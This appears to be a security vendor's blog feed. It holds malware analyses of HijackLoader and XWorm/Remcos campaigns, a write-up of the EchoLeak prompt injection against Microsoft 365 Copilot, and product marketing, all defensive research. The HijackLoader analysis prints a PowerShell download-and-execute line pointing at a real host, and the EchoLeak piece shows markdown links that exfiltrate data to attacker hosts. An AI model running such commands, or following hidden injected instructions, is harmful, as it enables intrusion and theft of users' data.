mono = “(“ + “,”.join(map(str, cons)) + “)”

params_cons = params.copy()

params_cons.update({“monotone_constraints”: mono, “max_bin”: 512})

bst_cons = xgb.train(params_cons, dtr, num_boost_round=4000, evals=[(dva, “val”)],

                     early_stopping_rounds=200, verbose_eval=False)

print(“Best trees (constrained):”, bst_cons.best_iteration)

# 10) Compare the quality of bst_cons and bst with a few lines.

p_cons = bst_cons.predict(dte, iteration_range=(0, bst_cons.best_iteration + 1))

print(“PR AUC  baseline vs constrained:”, round(average_precision_score(y_te, p_te), 3),

      “vs”, round(average_precision_score(y_te, p_cons), 3))

print(“ROC AUC baseline vs constrained:”, round(roc_auc_score(y_te, p_te), 3),

      “vs”, round(roc_auc_score(y_te, p_cons), 3), “\n”)

# 11) Save both models

bst.save_model(“easy_xgb_base.ubj”)

bst_cons.save_model(“easy_xgb_cons.ubj”)

print(“Saved models: easy_xgb_base.ubj, easy_xgb_cons.ubj”)

Source link

سپتامبر 23, 2025

An Analysis of the Clickfix HijackLoader Phishing Campaign

Table of Contents

- The Evolving Threat of Attack Loaders

Technical Methodology and Analysis

- Initial Access and Social Engineering

- Multi-Stage Obfuscation and De-obfuscation

- Anti-Analysis Techniques

Quick Heal \ Seqrite Protection

Introduction

With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis.

We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It mostly appears as Malware-as-a-Service, which has been observed mainly in financially motivated campaigns globally.

HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base.

Since June 2025, we have observed attackers using Clickfix where it led unsuspecting victims to download malicious .msi installers that, in turn, resulted in HijackLoader execution. DeerStealer was observed being downloaded as the final executable on the victim’s machine then.

Recently, it has also been observed that TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem.

HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as:

Process doppelgänging with transacted sections

Direct syscalls under WOW64

Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks.

Infection Chain

Technical Overview

The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix(This technique was seen to be used by attackers in June 2025 as well).

Fig1: CAPTCHA-Based Phishing Page for Social Engineering

Fig2: HTA Dropper File for Initial Execution

This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.

Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below.

Fig4: First-Stage Obfuscated PowerShell Script

The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays.

While resolving the above payload, we see it gets decoded into below command, which while still unreadable, can be fully de-obfuscated.

Fig5: Deobfuscation of the First stage obfuscated payload

After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.

iex ((New-Object System.Net.WebClient).DownloadString(‘https://rs.mezi[.]bet/samie_bower.mp3’))

When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.

Fig6: Debugger View of Failed C2 Connection

The file samie-bower.mp3 is another PowerShell script, which at over 18,000 lines is heavily obfuscated and represents the next stage of the loader.

Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.

Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment.

While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command.

The above gibberish variable declaration has been resolved; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines, before loading another PowerShell script that likely injects the PE file.

Fig10: Intermediate PowerShell Script for PE Injection

Fig11: Base64-Encoded Embedded PE Payload

Decoding this file reveals an embedded PE file, identifiable by its MZ header.

This PE file is a heavily packed .NET executable.

The executable payload loads a significant amount of code, likely extracted from its resources section.

Fig14: In-Memory Unpacking of the .NET Executable

Once unpacked, the executable payload appears to load a DLL file.

This DLL file is also protected, likely to prevent reverse engineering and analysis.

HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below.

Fig17: Final C2 Server Connection Attempt

While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer Malware. This HijackLoader has been involved in downloading different stealer malware including Lumma as well.

Conclusion

Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment.

IOCs:

1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta
91[.]212[.]166[.]51
37[.]27[.]165[.]65:1477
cosi[.]com[.]ar
hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3
hxxp[:]//77[.]91[.]101[.]66/

Quick Heal \ Seqrite Protection:

Script.Trojan.49900.GC
Loader.StealerDropperCiR
Trojan.InfoStealerCiR
Trojan.Agent
BDS/511

MITRE Att&ck:

Tactic	Technique ID	Technique Name
Initial Access	T1566.002	Phishing: Spearphishing Link (CAPTCHA phishing page)
Initial Access	T1189	Drive-by Compromise (malvertising, SEO poisoning, fake installers)
Execution	T1059.001	Command and Scripting Interpreter: PowerShell
Defense Evasion	T1027	Obfuscated Files or Information (multi-stage obfuscated scripts)
	T1140	Deobfuscate/Decode Files or Information (Base64, XOR decoding)
	T1562.001	Impair Defenses: Disable or Modify Tools (unhooking DLLs)
	T1070.004	Indicator Removal: File Deletion (likely used in staged loaders)
	T1211	Exploitation for Defense Evasion (direct syscalls under WOW64)
	T1036	Masquerading (fake extensions like .mp3 for PowerShell scripts)
Discovery	T1082	System Information Discovery (VM checks, registry queries)
Discovery	T1497.001	Virtualization/Sandbox Evasion: System Checks
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys (registry tampering)
Persistence / Privilege Esc.	T1055	Process Injection (PE injection routines)
Command and Control (C2)	T1071.001	Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic)
Command and Control (C2)	T1105	Ingress Tool Transfer (downloading additional payloads)
Impact / Collection	T1056 / T1005	Input Capture / Data from Local System (info-stealer functionality of final payload)

Authors:

Niraj Lazarus Makasare

Shrutirupa Banerjiee

Source link

سپتامبر 12, 2025

The Silent AI Threat Hacking Microsoft 365 Copilot
Introduction:

What if your Al assistant wasn’t just helping you – but quietly helping someone else too?

A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

Vulnerability Overview:

In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

Attack Flow:

From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click Let’s understand below in detail!
1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI assisted processing. To conceal the injected instruction, the attacker uses various stealth techniques, such as: HTML comments.
2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:
[Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.
1. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}
These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.
1. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.
Mitigation Steps:

To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.
1. Prompt Isolation
One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.
1. Input Sanitization and Validation
All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style=”display:none;”>, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.
1. Disable Auto-Rendering of Untrusted Content
A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.
1. Context Access Restriction
Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.
1. AI Output Monitoring and Logging
Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.
1. User Training and Awareness
Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

References:

https://www.aim.security/lp/aim-labs-echoleak-blogpost

Author:

Nandini Seth

Adrip Mukherjee
Source link
سپتامبر 12, 2025

Malware Campaign Leverages SVGs, Email Attachments, and CDNs to Drop XWorm and Remcos via BAT Scripts

Table of Content:

Introduction
Infection Chain
Process Tree
Campaign 1:
– Persistence
– BATCH files
– PowerShell script
– Loader
– Xworm/Remcos
Campaign 2
Conclusion
IOCS
Detections
MITRE ATTACK TTPs

Introduction:

Recent threat campaigns have revealed an evolving use of BAT-based loaders to deliver Remote Access Trojans, including XWorm and Remcos. These campaigns often begin with a ZIP archive, typically hosted on trusted looking platforms such as ImgKit, and are designed to appear as legitimate content to entice user interaction.

Upon extraction, the ZIP file contains a highly obfuscated BAT script that serves as the initial stage of the infection chain. These BAT files use advanced techniques to evade static detection and are responsible for executing PowerShell based loaders that inject the RAT payload directly into memory. This approach enables fileless execution, a growing trend in modern malware to bypass endpoint defences.

A notable development in this campaign is the use of SVG files to distribute the malicious BAT scripts. These SVGs contain embedded JavaScript that triggers the execution chain when rendered in vulnerable environments or embedded in phishing pages. This technique highlights a shift toward using non-traditional file formats for malware delivery, exploiting their scripting capabilities to evade detection.

Infection Chain:

Process Tree:

Fig: Process Tree

Campaign 1:

During the analysis Campaign 1, we identified multiple BAT scripts associated with the campaign, indicating an evolving threat landscape. Some of these scripts appear to be in active development, containing partial or test-stage code, while others are fully functional and capable of executing the complete attack chain, including payload download, execution.

The image below showcases two BAT files:

Method 1: Delivered directly as an attachment via EML (email file).
Method 2: Downloaded via a URL hosted on the ImageKit platform.

This variation in delivery methods suggests that the threat actors are experimenting with different approaches to improve infection success rates and evade detection mechanisms.

Persistence:

The malware achieves persistence by creating a BAT file in the Windows Startup folder. This ensures that the malicious script is automatically executed whenever the user starts the system or logs into their account.

BATCH files:

The figure below displays the BAT script in its obfuscated form alongside its de obfuscated version.

Fig: Obfuscated and deobfuscated bat files

PowerShell script:

Below, the figure shows the PowerShell process window and the command-line arguments used during execution. This provides insight into how the malware leverages PowerShell for in-memory payload delivery. We will analyze the PowerShell script in detail in the following sections to understand its role in the deployment of XWorm.

Fig: Process window of PWERSHELL with argument as PS script

Fig: Obfuscated Poershell script as an argument

This PowerShell command runs the script by decoding a Base64 encoded string and executing it in the memory. It uses -nop to avoid loading the user profile, -w hidden to hide the window, and iex (Invoke-Expression) to run the decoded content.

Deobfuscated Script:

We divided the deobfuscated script into two parts. In first part of the PowerShell script; it is designed to locate and execute an obfuscated code embedded within a batch file (aoc.bat) located in the current user’s profile directory. Firstly, It retrieves the username from the environment variables to construct the full path to aoc.bat. It reads all lines using UTF-8 encoding and iterates through each line, specifically looking for lines that begin with a triple-colon comment prefix (:::), followed by a Base64-encoded string. Upon finding such a line, it attempts to decode the Base64 string into a byte array, then converts it into a Unicode string assigned to the variable $ttzhae. This decoded string ($ttzhae) contains an additional layer of PowerShell script, which is then executed in memory using Invoke-Expression. This allows the attacker to embed and execute complex or multi-stage malicious PowerShell logic covertly within a seemingly benign batch file comment, enabling stealthy and fileless execution.

The script programmatically disables two key Windows security mechanisms AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows) to evade detection. It leverages .NET reflection and dynamic delegate creation to resolve native functions such as GetProcAddress, GetModuleHandle, VirtualProtect, and AmsiInitialize. Using these, it locates and patches the AmsiScanBuffer function in memory with a instructions (mov eax, 0; ret), effectively bypassing AMSI scanning. Similarly, it disables event tracing by overwriting the beginning of EtwEventWrite with a return instruction. These in-memory modifications allow malicious PowerShell activity to execute stealthily, without being logged or scanned by endpoint protection solutions.

In the second part of the PowerShell script, it first retrieves the current user’s name from the environment and constructs the path to a file named aoc.bat located in the user’s profile directory. It proceeds to execute payloads embedded as encrypted and compressed .NET assemblies hidden within this batch file. The script specifically searches for a comment line prefixed with ::, which contains a Base64-encoded payload string. This string is then split into two parts using the backslash (\) as a delimiter. Each part undergoes Base64 decoding, AES decryption using a hardcoded key and IV (in CBC mode with PKCS7 padding), followed by GZIP decompression as illustrated in the accompanying figures. The result is two separate .NET assemblies, both loaded and executed directly in memory. The first assembly is invoked without any arguments, while the second is executed with ‘%*’ passed as a simulated command-line input.

Fig: Second Part of Script_ encryption function

The second payload plays a more critical role. it functions as a loader responsible for executing the final malware. which is XWorm remote access trojan (RAT).

Fig: Second Part of Script_ call to encryption function

Loader

The loader is designed to evade detection, disable event logging, and execute embedded payloads directly in the memory. It achieves this by either decrypting and running .NET executables via Assembly.Load or executing decrypted shellcode using VirtualProtect and delegates.

Fig: Encrypted Resource containing XWorm/remcos

Loader Capabilities:

Extract and execute embedded payloads

Here, we identified multiple loaders that utilize in-memory execution techniques to evade detection and persist stealthily. Some of these loaders contain encrypted .NET executables, which are decrypted at runtime and executed directly from memory using Assembly.Load followed by .EntryPoint. Invoke, allowing the loader to run managed code without writing the executable to disk.

In contrast, other variants have encrypted shellcode instead of a binary. These variants decrypt the shellcode, modify the memory protections using VirtualProtect to make it executable, and then execute it using a delegate created via Marshal.GetDelegateForFunctionPointer. As shown in below figures,

Xworm

We have previously reported on XWorm and Remcos earlier this year, providing an in-depth analysis of its core functionality, advanced capabilities such as keylogging, remote command execution, data exfiltration, and its methods of persistence and evasion.

In addition to XWorm, several variants in the same campaign also utilized Remcos, a widely known commercial Remote Access Trojan (RAT) that offers a range of capabilities, including remote desktop access, keylogging, command execution, file manipulation, screenshot capture, and data exfiltration.

Campaign 2:

Campaign 2 introduces a notable shift in malware delivery by leveraging SVG (Scalable Vector Graphics) files embedded with JavaScript, which are primarily used in phishing attacks. These malicious SVGs are crafted to appear as legitimate image files and are either rendered in vulnerable software environments (such as outdated image viewers or email clients) or embedded within phishing web pages designed to lure unsuspecting users. Now, the embedded JavaScript within the SVG file acts as a trigger mechanism, initiating the automatic download of a ZIP archive when the SVG is opened or previewed.

This downloaded ZIP archive contains an obfuscated BAT script, which serves as the initial access vector for the malware. Once the BAT script is executed either manually by the user or through social engineering tactics, it initiates a multi-stage infection chain similar to that observed in Campaign 1. Specifically, the BAT script invokes PowerShell commands to decode and execute a loader executable (EXE) directly in memory. This loader is responsible for decrypting and deploying the final payload, which in this campaign is the XWorm Remote Access Trojan (RAT).

The use of SVG as a delivery mechanism represents a noteworthy evolution in attack methodology, as image files are typically considered benign and are often excluded from deep content inspection by traditional security tools. By exploiting the scripting capabilities of SVGs, threat actors can effectively bypass perimeter defences and deliver malicious payloads in a fileless, stealthy manner.

Conclusion:

These campaigns highlight a growing trend in the use of obfuscated scripts, fileless malware, and non-traditional file formats like SVGs to deliver Remote Access Trojans such as XWorm and Remcos. By embedding payloads in BAT files and executing them via PowerShell, attackers effectively bypass static defences. The shift from using SVGs in phishing attacks to malware delivery further emphasizes the need for behavioural detection, content inspection, and improved user awareness to counter such evolving threats.

IOCS:

MD5	File
EDA018A9D51F3B09C20E88A15F630DF5	BAT
23E30938E00F89BF345C9C1E58A6CC1D	JS
1CE36351D7175E9244209AE0D42759D9	LOADER
EC04BC20CA447556C3BDCFCBF6662C60	XWORM
D439CB98CF44D359C6ABCDDDB6E85454	REMCOS

Detections:

Trojan.LoaderCiR

Trojan.GenericFC.S29960909

MITRE ATTACK TTPs:

Tactic	Technique ID & Name	Description
Execution	T1059.001 – Command and Scripting Interpreter: PowerShell	PowerShell is used to interpret commands, decrypt data, and invoke payloads.
	T1106 – Execution Through API	The script uses .NET APIs (e.g., Assembly.Load, Invoke) to execute payloads in memory.
Defense Evasion	T1027 – Obfuscated Files or Information	Payloads are Base64 encoded, AES-encrypted, and compressed to bypass static detections.
	T1140 – Deobfuscate/Decode Files or Information	The script decodes and decompresses payloads before execution.
	T1055.012 – Process Injection: .NET Assembly Injection	Payloads are loaded into memory
	T1036 – Masquerading	The malicious content is hidden in batch file.
Persistence	T1053 – Scheduled Task/Job	Establish persistence through strartup menu.
Initial Access	T1204 – User Execution	Execution depends on a user manually running the batch file
Command and Control	T1132 – Data Encoding	Base64 and encryption are used to encode commands or payloads.
	T1219 – Remote Access Software	Xworm provides full remote access and control over the infected host.
Credential Access	T1056.001 – Input Capture: Keylogging	XWorm includes keylogging functionality to steal user input and credentials.
Exfiltration	T1041 – Exfiltration Over C2 Channel	Stolen data is exfiltrated via the same C2 channel used by Xworm.

Source link

سپتامبر 11, 2025

The Missing Security Shield for Modern Threats
Introduction: A Security Crisis That Keeps Leaders Awake

Did you know that 97% of security professionals admit to losing sleep over potentially missed critical alerts? (Ponemon Institute) It’s not just paranoia—the risk is real. Security operations centers (SOCs) are flooded with tens of thousands of alerts daily, and missing even one critical incident can lead to catastrophic consequences.

Take the Target breach of 2013: attackers exfiltrated 41 million payment card records, costing the company $18.5 million in regulatory settlements and long-term brand damage (Reuters). The painful truth? Alerts were generated—but overwhelmed analysts failed to act on time.

Fast forward to 2025, and the situation is worse:
- 3.5 million unfilled cybersecurity positions worldwide (ISC2 Cybersecurity Workforce Study 2023)
- Average recruitment cycle of 150 days per role
- 100,000+ daily alerts in large SOCs as per Fortinet
Clearly, traditional SecOps cannot keep pace. This is where Artificial Intelligence (AI) steps in—not as a luxury, but as the missing security shield.

Why Traditional SecOps is Falling Short

Alert Fatigue & Human Limits

Manual triage overwhelms analysts. Studies show 81% of SOC teams cite manual investigation as their biggest bottleneck (TechTarget)—leading to burnout, mistakes, and missed detections.

Signature-Based Detection Can’t Keep Up

Conventional tools rely on known signatures. But attackers now deploy zero-days, polymorphic malware, and AI-generated phishing emails that evade these defenses. Gartner predicts 80% of modern threats bypass legacy signature-based systems by 2026 (Gartner Report).

Longer Dwell Times = Bigger Damage

Dwell time—the period attackers stay undetected—often stretches weeks to months. Verizon’s 2024 DBIR shows 62% of breaches go undetected for more than a month (Verizon DBIR 2024). During this time, attackers can steal data, deploy ransomware, or create persistent backdoors.

Ransomware at Machine Speed

Cybersecurity Ventures reports a ransomware attack every 11 seconds globally, with damages forecast to hit USD 265 billion annually by 2031 (Cybersecurity Ventures). Humans alone cannot fight threats at this velocity.

How AI Bridges the Gap in SecOps

AI isn’t replacing analysts—it’s augmenting them with superhuman speed, scale, and accuracy. Here’s how:

1. Anomaly-Based Threat Detection

AI establishes a baseline of normal behavior and flags deviations (e.g., unusual logins, abnormal data flows). Unlike static signatures, anomaly detection spots zero-days and advanced persistent threats (APTs).

2. Real-Time Threat Intelligence

AI ingests global threat feeds, correlates them with local telemetry, and predicts attack patterns before they hit. This allows SOCs to move from reactive defense to proactive hunting.

3. Automated Alert Triage

AI filters out noise and correlates alerts into coherent incident narratives. By cutting false positives by up to 60% (Tech Radar), AI frees analysts to focus on high-risk threats.

4. Privilege Management & Insider Threats

AI-driven Identity & Access Management (IAM) continuously checks user behavior against role requirements, preventing privilege creep and catching insider threats.

5. Automated Threat Containment

AI-powered orchestration platforms can:
- Isolate compromised endpoints
- Quarantine malicious traffic
- Trigger network segmentation
This shrinks containment windows from hours to minutes.

6. Shadow IT Discovery

Unauthorized apps and AI tools are rampant. AI maps shadow IT usage by analyzing traffic patterns, reducing blind spots and compliance risks.

7. Phishing & Deepfake Defense

Generative AI has supercharged phishing. Traditional keyword filters miss these, but AI can detect behavioral anomalies, reply-chain inconsistencies, and deepfake audio/video scams.

8. BYOD Endpoint Protection

AI monitors personal devices accessing corporate networks, detecting ransomware encryption patterns and isolating infected devices instantly.

Seqrite’s AI-Powered SecOps Advantage

Seqrite XDR Powered by GoDeep.AI
- Uses deep learning, behavioral analytics, and predictive intelligence.
- Reduces breach response cycles by 108 days compared to conventional methods (Seqrite internal benchmark).
- Correlates telemetry across endpoints, networks, cloud, and identities.
Seqrite Intelligent Assistant (SIA)
- A GenAI-powered virtual security analyst.
- Allows natural language queries—no complex syntax required.
- Automates workflows like incident summaries, risk assessments, and remediation steps.
- Cuts analyst workload by up to 50%.
The Unified Advantage

Traditional SOCs struggle with tool sprawl. Seqrite provides a unified architecture with centralized management, reducing complexity and cutting TCO by up to 47% (industry benchmarks).

The Future: Predictive & Agentic AI in SecOps
- Predictive AI: Anticipates breaches before they occur by analyzing historical + real-time telemetry.
- Causal AI: Maps cause-effect relationships in attacks, helping SOCs understand root causes, not just symptoms.
- Agentic AI: Autonomous agents will investigate and remediate incidents without human intervention, allowing SOC teams to focus on strategy.
Conclusion: AI Is No Longer Optional

Cybercriminals are already using AI to scale attacks. Without AI in SecOps, organizations risk falling hopelessly behind.

The benefits are clear:
- Faster detection (minutes vs weeks)
- Reduced false positives (by up to 60%)
- Automated containment (minutes vs hours)
- Continuous compliance readiness
AI is not replacing SecOps teams—it’s the missing shield that makes them unbeatable.
Source link
سپتامبر 11, 2025
Secure Mobile Device Management for Indian Businesses
In an increasingly mobile-first world, organizations are leveraging mobile devices for a variety of operational needs – making them indispensable tools for business productivity. Whether it’s sales reps using tablets in the field, managers accessing dashboards from their phones, or logistics teams managing and tracking deliveries in real time — mobile devices are the backbone of modern enterprises. However, this reliance introduces a complex set of security, compliance, and management challenges.

The Rising Threat Landscape

According to the Verizon 2024 Mobile Security Index, 28% of all cyberattacks on corporate endpoints targeted mobile devices¹, making them the second most attacked category after IoT. India, notably, accounted for 28% of global mobile malware attacks², and the threat is accelerating — cyberattacks in India’s government sector organizations alone increased by 138% in four years.

Common Challenges Faced by IT Teams

If your organization is issuing mobile devices but not actively managing them, you’re leaving a wide door open for cyber threats, data breaches, and productivity loss. Without a Mobile Device Management platform, IT Admins in an organization also struggle with multiple challenges, including:
- Lack of visibility into how and where devices are being used
- Compliance headaches, especially in sectors like BFSI and government
- Increased risk from data breaches and insider threats
- Rising IT overhead from manual device provisioning and support
- User resistance due to poor onboarding and restrictive policies
- High IT overhead for manual updates and troubleshooting
- Productivity losses due to device misuse
- Hidden costs from lost, misused, or underutilized devices
These issues not only compromise security but also hamper operational efficiency.

Enter Seqrite Mobile Device Management (MDM): Purpose-Built for Indian Enterprises

Seqrite Mobile Device Management (MDM) is a comprehensive solution designed to manage, secure, and optimize the use of company-owned mobile devices across industries. Seqrite MDM offers a comprehensive solution that empowers IT admins to streamline device management and security with ease. It simplifies device enrolment by automating provisioning and configuration, reducing manual effort and errors. With robust security features like inbuilt antivirus, password complexity enforcement, and remote wipe, organizations can ensure sensitive data remains protected. IT teams can also deploy managed applications consistently across devices, maintaining compliance and control. Furthermore, employees benefit from seamless access to corporate resources such as emails and files, driving greater productivity without compromising security

Seqrite MDM offers full lifecycle device deployment & management for Company Owned Devices with diverse operational modes:
1. Dedicated Devices
  Locked down devices for specific tasks or functions managed in kiosk/ launcher mode with only selected apps and features – reducing misuse and maximizing operational efficiency.
2. Fully Managed Devices
  Manage all apps, settings, and usage, ensuring complete security, compliance, and a consistent user experience with full administrative control.
3. Fully Managed Devices with Work Profile
  Hybrid model, allowing personal use while keeping work data isolated in a secure Android Work Profile – Manage only the work container, ensuring data separation, user privacy, and corporate compliance.
Seqrite MDM has following comprehensive mobile security and anti-theft features, which attribute to advanced differentiators setting it apart as a security-first MDM solution:
- Artificial Intelligence based Anti-Virus: Best-in-class, built-in antivirus engine that keeps the devices safe from cyber threats.
- Scheduled Scan: Remotely schedule a scan at any time and monitor the status of enrolled devices for security risks and infections.
- Incoming Call Blacklisting/Whitelisting: Restricts incoming calls to only approved series or contacts, reducing distractions and preventing unauthorized communication.
- Intruder Detection: Captures a photo via the front camera upon repeated failed unlock attempts, alerting users to potential unauthorized access.
- Camera/Mic Usage Alerts: Monitors and notifies when the camera or microphone is accessed by any app, ensuring privacy and threat detection.
- Data Breach Alerts: Integrates with public breach databases to alert if any enterprise email IDs have been exposed in known breaches.
